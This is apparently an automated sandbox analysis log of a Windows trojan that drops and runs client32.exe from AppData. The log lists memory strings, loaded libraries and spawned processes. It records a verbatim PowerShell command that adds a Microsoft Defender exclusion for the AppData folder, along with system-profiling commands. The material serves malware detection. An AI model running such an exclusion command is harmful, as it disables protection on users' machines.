                                Source: BUenB12U2a.exe, 00000000.00000003.1715430142.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714373322.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712987011.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716529790.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715513195.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1711310620.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716303770.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716224988.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716385209.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715953298.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716456872.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715691868.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712853031.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exeBinary or memory string: OriginalFilename vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1966146172.00007FFDFADC5000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1971139366.00007FFE01479000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1798824946.000002101119C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1798201497.00000210111CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1800502679.0000021011A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1797337365.00000210111CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1973817087.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1797646830.00000210111CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclient32.exe. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1800970683.00000210111C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1973004491.00007FFE13206000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclient32.exe. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1803046192.0000021011134000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1799328127.00000210111F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicapi.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1797337365.0000021011130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1972320237.00007FFE126F5000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1970302945.00007FFDFB890000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1799328127.00000210111E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicapi.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1798361127.00000210111CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1932901808.0000021010EEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1799122999.000002101120B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicapi.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1934980415.0000021010EF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1803194949.00000210118E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1797924656.0000021011988000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1801750956.00000210122D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1967340348.00007FFDFB2BA000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1800179941.00000210111C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1972031513.00007FFE11EE2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1970633037.00007FFE0081F000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibsslH vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1973205199.00007FFE13222000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1800730653.00000210111C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1801612970.00000210111C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1971832983.00007FFE11EC9000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1973406309.00007FFE1331D000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1939147543.0000021010EF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1959274900.0000021010910000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1797924656.00000210118E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1972755959.00007FFE130C6000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1796447903.00000210111C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclient32.exe. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.1971555986.00007FFE1151E000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1798504683.0000021011988000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1802845516.00000210111C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: classification engineClassification label: mal92.troj.evad.winEXE@20/97@5/5
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10307E20 GetCurrentProcess,OpenProcessToken,GetLastError,ImpersonateSelf,OpenProcessToken,GetLastError,PyErr_SetFromWindowsErrWithFilename,LookupPrivilegeValueA,GetLastError,PyErr_SetFromWindowsErrWithFilename,AdjustTokenPrivileges,GetLastError,PyErr_SetFromWindowsErrWithFilename,AdjustTokenPrivileges,RevertToSelf,CloseHandle,1_2_00007FFE10307E20
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10302A30 PyArg_ParseTuple,PyUnicode_AsWideCharString,PyEval_SaveThread,GetDiskFreeSpaceExW,PyEval_RestoreThread,PyMem_Free,PyExc_OSError,PyErr_SetExcFromWindowsErrWithFilenameObject,Py_BuildValue,1_2_00007FFE10302A30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10306069 PyDict_New,memset,CreateToolhelp32Snapshot,PyErr_SetFromWindowsErr,_Py_Dealloc,Process32First,PyLong_FromLong,PyLong_FromLong,PyDict_SetItem,_Py_Dealloc,_Py_Dealloc,Process32Next,CloseHandle,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseHandle,1_2_00007FFE10306069
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10308B10 PyArg_ParseTuple,StartServiceA,CloseServiceHandle,CloseServiceHandle,_Py_NoneStruct,_Py_NoneStruct,1_2_00007FFE10308B10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extractedJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282Jump to behavior
                                Source: BUenB12U2a.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeFile read: C:\Users\user\AppData\Roaming\extracted\client32.iniJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: BUenB12U2a.exeReversingLabs: Detection: 34%
                                Source: BUenB12U2a.exeVirustotal: Detection: 38%
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile read: C:\Users\user\Desktop\BUenB12U2a.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\extracted\client32.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe C:\Users\user\AppData\Roaming\extracted\client32.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                                Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe "C:\Users\user\AppData\Roaming\extracted\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe "C:\Users\user\AppData\Roaming\extracted\client32.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\extracted\client32.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe C:\Users\user\AppData\Roaming\extracted\client32.exeJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libffi-8.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libcrypto-3.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libssl-3.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libcrypto-3.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: pdh.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
